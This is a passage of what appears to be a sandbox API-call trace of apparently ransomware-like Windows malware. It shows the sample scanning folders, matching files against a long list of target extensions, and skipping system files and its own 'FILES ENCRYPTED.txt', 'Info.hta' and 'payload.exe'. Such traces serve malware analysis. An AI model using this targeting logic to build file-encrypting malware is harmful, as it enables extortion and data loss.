Size=0xfffe) returned 0x37912b8 [0033.101] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0033.101] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37a12c0 [0033.101] FindNextFileW (in: hFindFile=0x37a12c0, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.101] FindNextFileW (in: hFindFile=0x37a12c0, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0033.101] lstrlenW (lpString="desktop.ini") returned 11 [0033.101] lstrlenW (lpString=".1cd") returned 4 [0033.101] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0033.101] lstrlenW (lpString=".3ds") returned 4 [0033.101] lstrcmpiW (lpString1=".3ds", lpString2=".ini") returned -1 [0033.101] lstrlenW (lpString=".3fr") returned 4 [0033.101] lstrcmpiW (lpString1=".3fr", lpString2=".ini") returned -1 [0033.102] lstrlenW (lpString=".3g2") returned 4 [0033.102] lstrcmpiW (lpString1=".3g2", lpString2=".ini") returned -1 [0033.102] lstrlenW (lpString=".3gp") returned 4 [0033.102] lstrcmpiW (lpString1=".3gp", lpString2=".ini") returned -1 [0033.102] lstrlenW (lpString=".7z") returned 3 [0033.102] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0033.102] lstrlenW (lpString=".accda") returned 6 [0033.102] lstrcmpiW (lpString1=".accda", lpString2="op.ini") returned -1 [0033.102] lstrlenW (lpString=".accdb") returned 6 [0033.102] lstrcmpiW (lpString1=".accdb", lpString2="op.ini") returned -1 [0033.102] lstrlenW (lpString=".accdc") returned 6 [0033.102] lstrcmpiW (lpString1=".accdc", lpString2="op.ini") returned -1 [0033.102] lstrlenW (lpString=".accde") returned 6 [0033.102] lstrcmpiW (lpString1=".accde", lpString2="op.ini") returned -1 [0033.102] lstrlenW (lpString=".accdt") returned 6 [0033.102] lstrcmpiW (lpString1=".accdt", lpString2="op.ini") returned -1 [0033.102] lstrlenW (lpString=".accdw") returned 6 [0033.102] lstrcmpiW (lpString1=".accdw", lpString2="op.ini") returned -1 [0033.102] lstrlenW (lpString=".adb") returned 4 [0033.102] lstrcmpiW (lpString1=".adb", lpString2=".ini") returned -1 [0033.102] lstrlenW (lpString=".adp") returned 4 [0033.102] lstrcmpiW (lpString1=".adp", lpString2=".ini") returned -1 [0033.102] lstrlenW (lpString=".ai") returned 3 [0033.102] lstrcmpiW (lpString1=".ai", lpString2="ini") returned -1 [0033.102] lstrlenW (lpString=".ai3") returned 4 [0033.102] lstrcmpiW (lpString1=".ai3", lpString2=".ini") returned -1 [0033.102] lstrlenW (lpString=".ai4") returned 4 [0033.102] lstrcmpiW (lpString1=".ai4", lpString2=".ini") returned -1 [0033.102] lstrlenW (lpString=".ai5") returned 4 [0033.102] lstrcmpiW (lpString1=".ai5", lpString2=".ini") returned -1 [0033.102] lstrlenW (lpString=".ai6") returned 4 [0033.102] lstrcmpiW (lpString1=".ai6", lpString2=".ini") returned -1 [0033.103] lstrlenW (lpString=".ai7") returned 4 [0033.103] lstrcmpiW (lpString1=".ai7", lpString2=".ini") returned -1 [0033.103] lstrlenW (lpString=".ai8") returned 4 [0033.103] lstrcmpiW (lpString1=".ai8", lpString2=".ini") returned -1 [0033.103] lstrlenW (lpString=".anim") returned 5 [0033.103] lstrcmpiW (lpString1=".anim", lpString2="p.ini") returned -1 [0033.103] lstrlenW (lpString=".arw") returned 4 [0033.103] lstrcmpiW (lpString1=".arw", lpString2=".ini") returned -1 [0033.103] lstrlenW (lpString=".as") returned 3 [0033.103] lstrcmpiW (lpString1=".as", lpString2="ini") returned -1 [0033.103] lstrlenW (lpString=".asa") returned 4 [0033.103] lstrcmpiW (lpString1=".asa", lpString2=".ini") returned -1 [0033.103] lstrlenW (lpString=".asc") returned 4 [0033.103] lstrcmpiW (lpString1=".asc", lpString2=".ini") returned -1 [0033.103] lstrlenW (lpString=".ascx") returned 5 [0033.103] lstrcmpiW (lpString1=".ascx", lpString2="p.ini") returned -1 [0033.103] lstrlenW (lpString=".asm") returned 4 [0033.103] lstrcmpiW (lpString1=".asm", lpString2=".ini") returned -1 [0033.103] lstrlenW (lpString=".asmx") returned 5 [0033.103] lstrcmpiW (lpString1=".asmx", lpString2="p.ini") returned -1 [0033.103] lstrlenW (lpString=".asp") returned 4 [0033.103] lstrcmpiW (lpString1=".asp", lpString2=".ini") returned -1 [0033.103] lstrlenW (lpString=".aspx") returned 5 [0033.103] lstrcmpiW (lpString1=".aspx", lpString2="p.ini") returned -1 [0033.103] lstrlenW (lpString=".asr") returned 4 [0033.103] lstrcmpiW (lpString1=".asr", lpString2=".ini") returned -1 [0033.103] lstrlenW (lpString=".asx") returned 4 [0033.103] lstrcmpiW (lpString1=".asx", lpString2=".ini") returned -1 [0033.103] lstrlenW (lpString=".avi") returned 4 [0033.103] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0033.103] lstrlenW (lpString=".avs") returned 4 [0033.103] lstrcmpiW (lpString1=".avs", lpString2=".ini") returned -1 [0033.103] lstrlenW (lpString=".backup") returned 7 [0033.103] lstrcmpiW (lpString1=".backup", lpString2="top.ini") returned -1 [0033.103] lstrlenW (lpString=".bak") returned 4 [0033.103] lstrcmpiW (lpString1=".bak", lpString2=".ini") returned -1 [0033.103] lstrlenW (lpString=".bay") returned 4 [0033.103] lstrcmpiW (lpString1=".bay", lpString2=".ini") returned -1 [0033.103] lstrlenW (lpString=".bd") returned 3 [0033.104] lstrcmpiW (lpString1=".bd", lpString2="ini") returned -1 [0033.104] lstrlenW (lpString=".bin") returned 4 [0033.104] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0033.104] lstrlenW (lpString=".bmp") returned 4 [0033.104] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0033.104] lstrlenW (lpString=".bz2") returned 4 [0033.104] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0033.104] lstrlenW (lpString=".c") returned 2 [0033.104] lstrcmpiW (lpString1=".c", lpString2="ni") returned -1 [0033.104] lstrlenW (lpString=".cdr") returned 4 [0033.104] lstrcmpiW (lpString1=".cdr", lpString2=".ini") returned -1 [0033.104] lstrlenW (lpString=".cer") returned 4 [0033.104] lstrcmpiW (lpString1=".cer", lpString2=".ini") returned -1 [0033.104] lstrlenW (lpString=".cf") returned 3 [0033.104] lstrcmpiW (lpString1=".cf", lpString2="ini") returned -1 [0033.104] lstrlenW (lpString=".cfc") returned 4 [0033.104] lstrcmpiW (lpString1=".cfc", lpString2=".ini") returned -1 [0033.104] lstrlenW (lpString=".cfm") returned 4 [0033.104] lstrcmpiW (lpString1=".cfm", lpString2=".ini") returned -1 [0033.104] lstrlenW (lpString=".cfml") returned 5 [0033.104] lstrcmpiW (lpString1=".cfml", lpString2="p.ini") returned -1 [0033.104] lstrlenW (lpString=".cfu") returned 4 [0033.104] lstrcmpiW (lpString1=".cfu", lpString2=".ini") returned -1 [0033.104] lstrlenW (lpString=".chm") returned 4 [0033.104] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1 [0033.104] lstrlenW (lpString=".cin") returned 4 [0033.104] lstrcmpiW (lpString1=".cin", lpString2=".ini") returned -1 [0033.104] lstrlenW (lpString=".class") returned 6 [0033.104] lstrcmpiW (lpString1=".class", lpString2="op.ini") returned -1 [0033.104] lstrlenW (lpString=".clx") returned 4 [0033.104] lstrcmpiW (lpString1=".clx", lpString2=".ini") returned -1 [0033.104] lstrlenW (lpString=".config") returned 7 [0033.104] lstrcmpiW (lpString1=".config", lpString2="top.ini") returned -1 [0033.104] lstrlenW (lpString=".cpp") returned 4 [0033.104] lstrcmpiW (lpString1=".cpp", lpString2=".ini") returned -1 [0033.104] lstrlenW (lpString=".cr2") returned 4 [0033.104] lstrcmpiW (lpString1=".cr2", lpString2=".ini") returned -1 [0033.104] lstrlenW (lpString=".crt") returned 4 [0033.105] lstrcmpiW (lpString1=".crt", lpString2=".ini") returned -1 [0033.105] lstrlenW (lpString=".crw") returned 4 [0033.105] lstrcmpiW (lpString1=".crw", lpString2=".ini") returned -1 [0033.105] lstrlenW (lpString=".cs") returned 3 [0033.105] lstrcmpiW (lpString1=".cs", lpString2="ini") returned -1 [0033.105] lstrlenW (lpString=".css") returned 4 [0033.105] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0033.105] lstrlenW (lpString=".csv") returned 4 [0033.105] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0033.105] lstrlenW (lpString=".cub") returned 4 [0033.105] lstrcmpiW (lpString1=".cub", lpString2=".ini") returned -1 [0033.105] lstrlenW (lpString=".dae") returned 4 [0033.105] lstrcmpiW (lpString1=".dae", lpString2=".ini") returned -1 [0033.105] lstrlenW (lpString=".dat") returned 4 [0033.105] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0033.105] lstrlenW (lpString=".db") returned 3 [0033.105] lstrcmpiW (lpString1=".db", lpString2="ini") returned -1 [0033.105] lstrlenW (lpString=".dbf") returned 4 [0033.105] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0033.105] lstrlenW (lpString=".dbx") returned 4 [0033.105] lstrcmpiW (lpString1=".dbx", lpString2=".ini") returned -1 [0033.105] lstrlenW (lpString=".dc3") returned 4 [0033.105] lstrcmpiW (lpString1=".dc3", lpString2=".ini") returned -1 [0033.105] lstrlenW (lpString=".dcm") returned 4 [0033.105] lstrcmpiW (lpString1=".dcm", lpString2=".ini") returned -1 [0033.105] lstrlenW (lpString=".dcr") returned 4 [0033.105] lstrcmpiW (lpString1=".dcr", lpString2=".ini") returned -1 [0033.105] lstrlenW (lpString=".der") returned 4 [0033.105] lstrcmpiW (lpString1=".der", lpString2=".ini") returned -1 [0033.105] lstrlenW (lpString=".dib") returned 4 [0033.105] lstrcmpiW (lpString1=".dib", lpString2=".ini") returned -1 [0033.105] lstrlenW (lpString=".dic") returned 4 [0033.105] lstrcmpiW (lpString1=".dic", lpString2=".ini") returned -1 [0033.105] lstrlenW (lpString=".dif") returned 4 [0033.105] lstrcmpiW (lpString1=".dif", lpString2=".ini") returned -1 [0033.105] lstrlenW (lpString=".divx") returned 5 [0033.105] lstrcmpiW (lpString1=".divx", lpString2="p.ini") returned -1 [0033.106] lstrlenW (lpString=".djvu") returned 5 [0033.106] lstrcmpiW (lpString1=".djvu", lpString2="p.ini") returned -1 [0033.106] lstrlenW (lpString=".dng") returned 4 [0033.106] lstrcmpiW (lpString1=".dng", lpString2=".ini") returned -1 [0033.106] lstrlenW (lpString=".doc") returned 4 [0033.106] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0033.106] lstrlenW (lpString=".docm") returned 5 [0033.106] lstrcmpiW (lpString1=".docm", lpString2="p.ini") returned -1 [0033.106] lstrlenW (lpString=".docx") returned 5 [0033.106] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0033.106] lstrlenW (lpString=".dot") returned 4 [0033.106] lstrcmpiW (lpString1=".dot", lpString2=".ini") returned -1 [0033.106] lstrlenW (lpString=".dotm") returned 5 [0033.106] lstrcmpiW (lpString1=".dotm", lpString2="p.ini") returned -1 [0033.106] lstrlenW (lpString=".dotx") returned 5 [0033.106] lstrcmpiW (lpString1=".dotx", lpString2="p.ini") returned -1 [0033.106] lstrlenW (lpString=".dpx") returned 4 [0033.106] lstrcmpiW (lpString1=".dpx", lpString2=".ini") returned -1 [0033.106] lstrlenW (lpString=".dqy") returned 4 [0033.106] lstrcmpiW (lpString1=".dqy", lpString2=".ini") returned -1 [0033.106] lstrlenW (lpString=".dsn") returned 4 [0033.106] lstrcmpiW (lpString1=".dsn", lpString2=".ini") returned -1 [0033.106] lstrlenW (lpString=".dt") returned 3 [0033.106] lstrcmpiW (lpString1=".dt", lpString2="ini") returned -1 [0033.106] lstrlenW (lpString=".dtd") returned 4 [0033.106] lstrcmpiW (lpString1=".dtd", lpString2=".ini") returned -1 [0033.106] lstrlenW (lpString=".dwg") returned 4 [0033.106] lstrcmpiW (lpString1=".dwg", lpString2=".ini") returned -1 [0033.106] lstrlenW (lpString=".dwt") returned 4 [0033.106] lstrcmpiW (lpString1=".dwt", lpString2=".ini") returned -1 [0033.106] lstrlenW (lpString=".dx") returned 3 [0033.106] lstrcmpiW (lpString1=".dx", lpString2="ini") returned -1 [0033.106] lstrlenW (lpString=".dxf") returned 4 [0033.106] lstrcmpiW (lpString1=".dxf", lpString2=".ini") returned -1 [0033.106] lstrlenW (lpString=".edml") returned 5 [0033.106] lstrcmpiW (lpString1=".edml", lpString2="p.ini") returned -1 [0033.106] lstrlenW (lpString=".efd") returned 4 [0033.106] lstrcmpiW (lpString1=".efd", lpString2=".ini") returned -1 [0033.107] lstrlenW (lpString=".elf") returned 4 [0033.107] lstrcmpiW (lpString1=".elf", lpString2=".ini") returned -1 [0033.107] lstrlenW (lpString=".emf") returned 4 [0033.107] lstrcmpiW (lpString1=".emf", lpString2=".ini") returned -1 [0033.107] lstrlenW (lpString=".emz") returned 4 [0033.107] lstrcmpiW (lpString1=".emz", lpString2=".ini") returned -1 [0033.107] lstrlenW (lpString=".epf") returned 4 [0033.107] lstrcmpiW (lpString1=".epf", lpString2=".ini") returned -1 [0033.107] lstrlenW (lpString=".eps") returned 4 [0033.107] lstrcmpiW (lpString1=".eps", lpString2=".ini") returned -1 [0033.107] lstrlenW (lpString=".epsf") returned 5 [0033.107] lstrcmpiW (lpString1=".epsf", lpString2="p.ini") returned -1 [0033.107] lstrlenW (lpString=".epsp") returned 5 [0033.107] lstrcmpiW (lpString1=".epsp", lpString2="p.ini") returned -1 [0033.107] lstrlenW (lpString=".erf") returned 4 [0033.107] lstrcmpiW (lpString1=".erf", lpString2=".ini") returned -1 [0033.107] lstrlenW (lpString=".exr") returned 4 [0033.107] lstrcmpiW (lpString1=".exr", lpString2=".ini") returned -1 [0033.107] lstrlenW (lpString=".f4v") returned 4 [0033.107] lstrcmpiW (lpString1=".f4v", lpString2=".ini") returned -1 [0033.107] lstrlenW (lpString=".fido") returned 5 [0033.107] lstrcmpiW (lpString1=".fido", lpString2="p.ini") returned -1 [0033.107] lstrlenW (lpString=".flm") returned 4 [0033.107] lstrcmpiW (lpString1=".flm", lpString2=".ini") returned -1 [0033.107] lstrlenW (lpString=".flv") returned 4 [0033.107] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0033.107] lstrlenW (lpString=".frm") returned 4 [0033.107] lstrcmpiW (lpString1=".frm", lpString2=".ini") returned -1 [0033.107] lstrlenW (lpString=".fxg") returned 4 [0033.107] lstrcmpiW (lpString1=".fxg", lpString2=".ini") returned -1 [0033.107] lstrlenW (lpString=".geo") returned 4 [0033.107] lstrcmpiW (lpString1=".geo", lpString2=".ini") returned -1 [0033.107] lstrlenW (lpString=".gif") returned 4 [0033.107] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0033.107] lstrlenW (lpString=".grs") returned 4 [0033.107] lstrcmpiW (lpString1=".grs", lpString2=".ini") returned -1 [0033.107] lstrlenW (lpString=".gz") returned 3 [0033.107] lstrcmpiW (lpString1=".gz", lpString2="ini") returned -1 [0033.108] lstrlenW (lpString=".h") returned 2 [0033.108] lstrcmpiW (lpString1=".h", lpString2="ni") returned -1 [0033.108] lstrlenW (lpString=".hdr") returned 4 [0033.108] lstrcmpiW (lpString1=".hdr", lpString2=".ini") returned -1 [0033.108] lstrlenW (lpString=".hpp") returned 4 [0033.108] lstrcmpiW (lpString1=".hpp", lpString2=".ini") returned -1 [0033.108] lstrlenW (lpString=".hta") returned 4 [0033.108] lstrcmpiW (lpString1=".hta", lpString2=".ini") returned -1 [0033.108] lstrlenW (lpString=".htc") returned 4 [0033.108] lstrcmpiW (lpString1=".htc", lpString2=".ini") returned -1 [0033.108] lstrlenW (lpString=".htm") returned 4 [0033.108] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0033.108] lstrlenW (lpString=".html") returned 5 [0033.108] lstrcmpiW (lpString1=".html", lpString2="p.ini") returned -1 [0033.108] lstrlenW (lpString=".icb") returned 4 [0033.108] lstrcmpiW (lpString1=".icb", lpString2=".ini") returned -1 [0033.108] lstrlenW (lpString=".ics") returned 4 [0033.108] lstrcmpiW (lpString1=".ics", lpString2=".ini") returned -1 [0033.108] lstrlenW (lpString=".iff") returned 4 [0033.108] lstrcmpiW (lpString1=".iff", lpString2=".ini") returned -1 [0033.108] lstrlenW (lpString=".inc") returned 4 [0033.108] lstrcmpiW (lpString1=".inc", lpString2=".ini") returned -1 [0033.108] lstrlenW (lpString=".indd") returned 5 [0033.108] lstrcmpiW (lpString1=".indd", lpString2="p.ini") returned -1 [0033.108] lstrlenW (lpString=".ini") returned 4 [0033.108] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0033.108] lstrlenW (lpString="desktop.ini") returned 11 [0033.108] lstrlenW (lpString=".USA") returned 4 [0033.108] lstrcmpiW (lpString1=".USA", lpString2=".ini") returned 1 [0033.108] lstrlenW (lpString="desktop.ini") returned 11 [0033.108] lstrcmpiW (lpString1="boot.ini", lpString2="desktop.ini") returned -1 [0033.108] lstrcmpiW (lpString1="bootfont.bin", lpString2="desktop.ini") returned -1 [0033.108] lstrcmpiW (lpString1="ntldr", lpString2="desktop.ini") returned 1 [0033.108] lstrcmpiW (lpString1="ntdetect.com", lpString2="desktop.ini") returned 1 [0033.108] lstrcmpiW (lpString1="io.sys", lpString2="desktop.ini") returned 1 [0033.108] lstrcmpiW (lpString1="FILES ENCRYPTED.txt", lpString2="desktop.ini") returned 1 [0033.108] lstrcmpiW (lpString1="Info.hta", lpString2="desktop.ini") returned 1 [0033.108] lstrcmpiW (lpString1="payload.exe", lpString2="desktop.ini") returned 1 [0033.109] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.109] FindNextFileW (in: hFindFile=0x37a12c0, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0033.109] FindClose (in: hFindFile=0x37a12c0 | out: hFindFile=0x37a12c0) returned 1 [0033.109] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x37912b8 | out: hHeap=0x5d0000) returned 1 [0033.109] FindNextFileW (in: hFindFile=0x3790270, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0033.109] FindClose (in: hFindFile=0x3790270 | out: hFindFile=0x3790270) returned 1 [0033.109] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3780268 | out: hHeap=0x5d0000) returned 1 [0033.109] FindNextFileW (in: hFindFile=0x65e210, lpFindFileData=0x2f2fd00 | out: lpFindFileData=0x2f2fd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0033.109] lstrlenW (lpString="C:\\Boot") returned 7 [0033.109] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Boot") returned 1 [0033.109] lstrlenW (lpString="Boot") returned 4 [0033.109] lstrcmpiW (lpString1="C:\\Windows", lpString2="Boot") returned 1 [0033.109] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3780268 [0033.109] lstrlenW (lpString="C:\\Boot") returned 7 [0033.109] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x628500 [0033.109] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.109] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0033.109] lstrlenW (lpString="BCD") returned 3 [0033.110] lstrlenW (lpString=".1cd") returned 4 [0033.110] lstrcmpiW (lpString1=".1cd", lpString2="") returned 1 [0033.110] lstrlenW (lpString=".3ds") returned 4 [0033.110] lstrcmpiW (lpString1=".3ds", lpString2="") returned 1 [0033.110] lstrlenW (lpString=".3fr") returned 4 [0033.110] lstrcmpiW (lpString1=".3fr", lpString2="") returned 1 [0033.110] lstrlenW (lpString=".3g2") returned 4 [0033.110] lstrcmpiW (lpString1=".3g2", lpString2="") returned 1 [0033.110] lstrlenW (lpString=".3gp") returned 4 [0033.110] lstrcmpiW (lpString1=".3gp", lpString2="") returned 1 [0033.110] lstrlenW (lpString=".7z") returned 3 [0033.110] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0033.110] lstrlenW (lpString=".accda") returned 6 [0033.110] lstrcmpiW (lpString1=".accda", lpString2="") returned 1 [0033.110] lstrlenW (lpString=".accdb") returned 6 [0033.110] lstrcmpiW (lpString1=".accdb", lpString2="") returned 1 [0033.110] lstrlenW (lpString=".accdc") returned 6 [0033.110] lstrcmpiW (lpString1=".accdc", lpString2="") returned 1 [0033.110] lstrlenW (lpString=".accde") returned 6 [0033.110] lstrcmpiW (lpString1=".accde", lpString2="") returned 1 [0033.110] lstrlenW (lpString=".accdt") returned 6 [0033.110] lstrcmpiW (lpString1=".accdt", lpString2="") returned 1 [0033.110] lstrlenW (lpString=".accdw") returned 6 [0033.110] lstrcmpiW (lpString1=".accdw", lpString2="") returned 1 [0033.110] lstrlenW (lpString=".adb") returned 4 [0033.110] lstrcmpiW (lpString1=".adb", lpString2="") returned 1 [0033.110] lstrlenW (lpString=".adp") returned 4 [0033.110] lstrcmpiW (lpString1=".adp", lpString2="") returned 1 [0033.110] lstrlenW (lpString=".ai") returned 3 [0033.110] lstrcmpiW (lpString1=".ai", lpString2="BCD") returned -1 [0033.110] lstrlenW (lpString=".ai3") returned 4 [0033.110] lstrcmpiW (lpString1=".ai3", lpString2="") returned 1 [0033.110] lstrlenW (lpString=".ai4") returned 4 [0033.110] lstrcmpiW (lpString1=".ai4", lpString2="") returned 1 [0033.110] lstrlenW (lpString=".ai5") returned 4 [0033.110] lstrcmpiW (lpString1=".ai5", lpString2="") returned 1 [0033.110] lstrlenW (lpString=".ai6") returned 4 [0033.111] lstrcmpiW (lpString1=".ai6", lpString2="") returned 1 [0033.111] lstrlenW (lpString=".ai7") returned 4 [0033.111] lstrcmpiW (lpString1=".ai7", lpString2="") returned 1 [0033.111] lstrlenW (lpString=".ai8") returned 4 [0033.111] lstrcmpiW (lpString1=".ai8", lpString2="") returned 1 [0033.111] lstrlenW (lpString=".anim") returned 5 [0033.111] lstrcmpiW (lpString1=".anim", lpString2="") returned 1 [0033.111] lstrlenW (lpString=".arw") returned 4 [0033.111] lstrcmpiW (lpString1=".arw", lpString2="") returned 1 [0033.111] lstrlenW (lpString=".as") returned 3 [0033.111] lstrcmpiW (lpString1=".as", lpString2="BCD") returned -1 [0033.111] lstrlenW (lpString=".asa") returned 4 [0033.111] lstrcmpiW (lpString1=".asa", lpString2="") returned 1 [0033.111] lstrlenW (lpString=".asc") returned 4 [0033.111] lstrcmpiW (lpString1=".asc", lpString2="") returned 1 [0033.111] lstrlenW (lpString=".ascx") returned 5 [0033.111] lstrcmpiW (lpString1=".ascx", lpString2="") returned 1 [0033.111] lstrlenW (lpString=".asm") returned 4 [0033.111] lstrcmpiW (lpString1=".asm", lpString2="") returned 1 [0033.111] lstrlenW (lpString=".asmx") returned 5 [0033.111] lstrcmpiW (lpString1=".asmx", lpString2="") returned 1 [0033.111] lstrlenW (lpString=".asp") returned 4 [0033.111] lstrcmpiW (lpString1=".asp", lpString2="") returned 1 [0033.111] lstrlenW (lpString=".aspx") returned 5 [0033.111] lstrcmpiW (lpString1=".aspx", lpString2="") returned 1 [0033.111] lstrlenW (lpString=".asr") returned 4 [0033.111] lstrcmpiW (lpString1=".asr", lpString2="") returned 1 [0033.111] lstrlenW (lpString=".asx") returned 4 [0033.111] lstrcmpiW (lpString1=".asx", lpString2="") returned 1 [0033.111] lstrlenW (lpString=".avi") returned 4 [0033.111] lstrcmpiW (lpString1=".avi", lpString2="") returned 1 [0033.111] lstrlenW (lpString=".avs") returned 4 [0033.111] lstrcmpiW (lpString1=".avs", lpString2="") returned 1 [0033.111] lstrlenW (lpString=".backup") returned 7 [0033.111] lstrcmpiW (lpString1=".backup", lpString2="") returned 1 [0033.111] lstrlenW (lpString=".bak") returned 4 [0033.111] lstrcmpiW (lpString1=".bak", lpString2="") returned 1 [0033.111] lstrlenW (lpString=".bay") returned 4 [0033.111] lstrcmpiW (lpString1=".bay", lpString2="") returned 1 [0033.112] lstrlenW (lpString=".bd") returned 3 [0033.112] lstrcmpiW (lpString1=".bd", lpString2="BCD") returned -1 [0033.112] lstrlenW (lpString=".bin") returned 4 [0033.112] lstrcmpiW (lpString1=".bin", lpString2="") returned 1 [0033.112] lstrlenW (lpString=".bmp") returned 4 [0033.112] lstrcmpiW (lpString1=".bmp", lpString2="") returned 1 [0033.112] lstrlenW (lpString=".bz2") returned 4 [0033.112] lstrcmpiW (lpString1=".bz2", lpString2="") returned 1 [0033.112] lstrlenW (lpString=".c") returned 2 [0033.112] lstrcmpiW (lpString1=".c", lpString2="CD") returned -1 [0033.112] lstrlenW (lpString=".cdr") returned 4 [0033.112] lstrcmpiW 